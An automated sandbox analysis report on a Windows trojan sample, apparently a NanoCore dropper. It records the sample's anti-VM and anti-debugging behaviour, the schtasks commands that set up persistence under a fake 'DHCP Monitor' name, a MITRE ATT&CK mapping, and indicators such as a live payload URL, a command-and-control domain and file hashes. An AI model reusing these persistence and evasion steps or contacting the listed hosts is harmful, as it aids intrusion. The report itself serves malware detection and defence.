Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeRDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:
Tries to detect Any.runShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeRDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exeRDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6028Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 3560Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Hides threads from debuggersShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection11Masquerading2OS Credential DumpingSecurity Software Discovery41Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobDLL Side-Loading1Scheduled Task/Job1Virtualization/Sandbox Evasion23LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsSystem Information Discovery22SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356594 Sample: SecuriteInfo.com.Variant.Ra... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 45 ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu 2->45 53 Multi AV Scanner detection for domain / URL 2->53 55 Sigma detected: Scheduled temp file as task from temp location 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 3 other signatures 2->59 9 SecuriteInfo.com.Variant.Razy.845229.13077.exe 1 2->9         started        12 dhcpmon.exe 4 2->12         started        14 RegAsm.exe 4 2->14         started        signatures3 process4 signatures5 61 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 9->61 63 Tries to detect virtualization through RDTSC time measurements 9->63 16 RegAsm.exe 1 20 9->16         started        21 conhost.exe 12->21         started        23 conhost.exe 14->23         started        process6 dnsIp7 41 mtspsmjeli.sch.id 103.150.60.242, 49741, 80 PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID unknown 16->41 43 ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu 10.2.118.40, 6932 unknown unknown 16->43 35 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 16->35 dropped 37 C:\Users\user\AppData\Local\...\tmp167E.tmp, XML 16->37 dropped 39 C:\Program Files (x86)\...\dhcpmon.exe, PE32 16->39 dropped 47 Tries to detect Any.run 16->47 49 Hides threads from debuggers 16->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->51 25 schtasks.exe 1 16->25         started        27 schtasks.exe 1 16->27         started        29 conhost.exe 16->29         started        file8 signatures9 process10 process11 31 conhost.exe 25->31         started        33 conhost.exe 27->33         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Variant.Razy.845229.13077.exe33%VirustotalBrowse
SecuriteInfo.com.Variant.Razy.845229.13077.exe36%ReversingLabsWin32.Trojan.Razy
SecuriteInfo.com.Variant.Razy.845229.13077.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
mtspsmjeli.sch.id12%VirustotalBrowse
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin15%VirustotalBrowse
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mtspsmjeli.sch.id
103.150.60.242
truetrueunknown
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu
10.2.118.40
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bintrue
  • 15%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
103.150.60.242
unknownunknown
45325PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaIDtrue

Private

IP
10.2.118.40

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:356594
Start date:23.02.2021
Start time:11:52:47
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 39s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winEXE@13/9@7/2
EGA Information:Failed
HDC Information:
  • Successful, ratio: 8.8% (good quality ratio 1.2%)
  • Quality average: 5.1%
  • Quality standard deviation: 10.1%
HCA Information:
  • Successful, ratio: 83%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
Show All
  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
  • TCP Packets have been reduced to 100
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 51.104.144.132, 131.253.33.200, 13.107.22.200, 93.184.220.29, 13.64.90.137, 13.88.21.125, 92.122.145.220, 104.43.139.144, 168.61.161.212, 184.30.20.56, 51.103.5.186, 8.248.117.254, 8.253.207.120, 8.253.204.121, 8.248.147.254, 67.26.75.254, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
11:57:31AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
11:57:32Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
11:57:33API Interceptor35x Sleep call for process: RegAsm.exe modified
11:57:34Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
103.150.60.242SecuriteInfo.com.Variant.Razy.845229.27038.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin
Lowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/VOP.exe
4AtUJN8Hdu.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
XP 6.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/CUN.exe
Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/AWT.exe
TT.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
w0JlVAbpIT.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
3661RJTi5M.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
TgrhfQLDyB.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
Bjdl7RO0K8.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
4hW0TZqN01.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
vTQWcy77WI.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
LdOgPDsMEf.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
6QlgtXWPBZ.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
OXplew3YfS.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
pWokqkAwi2.exeGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
FT102038332370.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/OSE.exe
UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/AQT.exe
Payment Confirmation .xlsxGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/AET.exe
Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
  • mtspsmjeli.sch.id/Img/UDI.exe

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
mtspsmjeli.sch.idSecuriteInfo.com.Variant.Razy.845229.27038.exeGet hashmaliciousBrowse
  • 103.150.60.242
Lowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
4AtUJN8Hdu.exeGet hashmaliciousBrowse
  • 103.150.60.242
XP 6.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
TT.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
w0JlVAbpIT.exeGet hashmaliciousBrowse
  • 103.150.60.242
3661RJTi5M.exeGet hashmaliciousBrowse
  • 103.150.60.242
TgrhfQLDyB.exeGet hashmaliciousBrowse
  • 103.150.60.242
Bjdl7RO0K8.exeGet hashmaliciousBrowse
  • 103.150.60.242
4hW0TZqN01.exeGet hashmaliciousBrowse
  • 103.150.60.242
vTQWcy77WI.exeGet hashmaliciousBrowse
  • 103.150.60.242
LdOgPDsMEf.exeGet hashmaliciousBrowse
  • 103.150.60.242
6QlgtXWPBZ.exeGet hashmaliciousBrowse
  • 103.150.60.242
OXplew3YfS.exeGet hashmaliciousBrowse
  • 103.150.60.242
pWokqkAwi2.exeGet hashmaliciousBrowse
  • 103.150.60.242
FT102038332370.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Payment Confirmation .xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
  • 103.150.60.242

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaIDSecuriteInfo.com.Variant.Razy.845229.27038.exeGet hashmaliciousBrowse
  • 103.150.60.242
Lowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
4AtUJN8Hdu.exeGet hashmaliciousBrowse
  • 103.150.60.242
XP 6.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
TT.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
w0JlVAbpIT.exeGet hashmaliciousBrowse
  • 103.150.60.242
3661RJTi5M.exeGet hashmaliciousBrowse
  • 103.150.60.242
TgrhfQLDyB.exeGet hashmaliciousBrowse
  • 103.150.60.242
Bjdl7RO0K8.exeGet hashmaliciousBrowse
  • 103.150.60.242
4hW0TZqN01.exeGet hashmaliciousBrowse
  • 103.150.60.242
vTQWcy77WI.exeGet hashmaliciousBrowse
  • 103.150.60.242
LdOgPDsMEf.exeGet hashmaliciousBrowse
  • 103.150.60.242
6QlgtXWPBZ.exeGet hashmaliciousBrowse
  • 103.150.60.242
OXplew3YfS.exeGet hashmaliciousBrowse
  • 103.150.60.242
pWokqkAwi2.exeGet hashmaliciousBrowse
  • 103.150.60.242
FT102038332370.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Payment Confirmation .xlsxGet hashmaliciousBrowse
  • 103.150.60.242
Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
  • 103.150.60.242

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exedocument.exeGet hashmaliciousBrowse
    w0JlVAbpIT.exeGet hashmaliciousBrowse
      Bjdl7RO0K8.exeGet hashmaliciousBrowse
        4hW0TZqN01.exeGet hashmaliciousBrowse
          d4e475d7d17a16be8b9eeac6e10b25af.exeGet hashmaliciousBrowse
            e5bd3238d220c97cd4d6969abb3b33e0.exeGet hashmaliciousBrowse
              1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
                Xf6v0G2wIM.exeGet hashmaliciousBrowse
                  jztWD1iKrC.exeGet hashmaliciousBrowse
                    wH22vdkhhU.exeGet hashmaliciousBrowse
                      AqpOn6nwXS.exeGet hashmaliciousBrowse
                        CklrD7MYX2.exeGet hashmaliciousBrowse
                          FahZG6Pdc4.exeGet hashmaliciousBrowse
                            61WlCsQR9Q.exeGet hashmaliciousBrowse
                              U7DiqWP9qu.exeGet hashmaliciousBrowse
                                d4x5rI09A7.exeGet hashmaliciousBrowse
                                  1WW425NrsA.exeGet hashmaliciousBrowse
                                    Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                      xdNg7FUNS2.exeGet hashmaliciousBrowse
                                        14muK1SuRQ.exeGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):53248
                                          Entropy (8bit):4.490095782293901
                                          Encrypted:false
                                          SSDEEP:768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
                                          MD5:529695608EAFBED00ACA9E61EF333A7C
                                          SHA1:68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
                                          SHA-256:44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
                                          SHA-512:8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: document.exe, Detection: malicious, Browse
                                          • Filename: w0JlVAbpIT.exe, Detection: malicious, Browse
                                          • Filename: Bjdl7RO0K8.exe, Detection: malicious, Browse
                                          • Filename: 4hW0TZqN01.exe, Detection: malicious, Browse
                                          • Filename: d4e475d7d17a16be8b9eeac6e10b25af.exe, Detection: malicious, Browse
                                          • Filename: e5bd3238d220c97cd4d6969abb3b33e0.exe, Detection: malicious, Browse
                                          • Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse
                                          • Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse
                                          • Filename: jztWD1iKrC.exe, Detection: malicious, Browse
                                          • Filename: wH22vdkhhU.exe, Detection: malicious, Browse
                                          • Filename: AqpOn6nwXS.exe, Detection: malicious, Browse
                                          • Filename: CklrD7MYX2.exe, Detection: malicious, Browse
                                          • Filename: FahZG6Pdc4.exe, Detection: malicious, Browse
                                          • Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse
                                          • Filename: U7DiqWP9qu.exe, Detection: malicious, Browse
                                          • Filename: d4x5rI09A7.exe, Detection: malicious, Browse
                                          • Filename: 1WW425NrsA.exe, Detection: malicious, Browse
                                          • Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse
                                          • Filename: xdNg7FUNS2.exe, Detection: malicious, Browse
                                          • Filename: 14muK1SuRQ.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):20
                                          Entropy (8bit):3.6841837197791887
                                          Encrypted:false
                                          SSDEEP:3:QHXMKas:Q3Las
                                          MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                          SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                          SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                          SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..
                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):20
                                          Entropy (8bit):3.6841837197791887
                                          Encrypted:false
                                          SSDEEP:3:QHXMKas:Q3Las
                                          MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                          SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                          SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                          SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                          Malicious:false
                                          Preview: 1,"fusion","GAC",0..
                                          C:\Users\user\AppData\Local\Temp\tmp167E.tmp
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1319
                                          Entropy (8bit):5.133606110275315
                                          Encrypted:false
                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
                                          MD5:C6F0625BF4C1CDFB699980C9243D3B22
                                          SHA1:43DE1FE580576935516327F17B5DA0C656C72851
                                          SHA-256:8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
                                          SHA-512:9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
                                          Malicious:true
                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                          C:\Users\user\AppData\Local\Temp\tmp19AB.tmp
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1310
                                          Entropy (8bit):5.109425792877704
                                          Encrypted:false
                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                          Malicious:false
                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):8
                                          Entropy (8bit):2.5
                                          Encrypted:false
                                          SSDEEP:3:39t:39t
                                          MD5:9C203C9B758291F4B1AF069610D92B5D
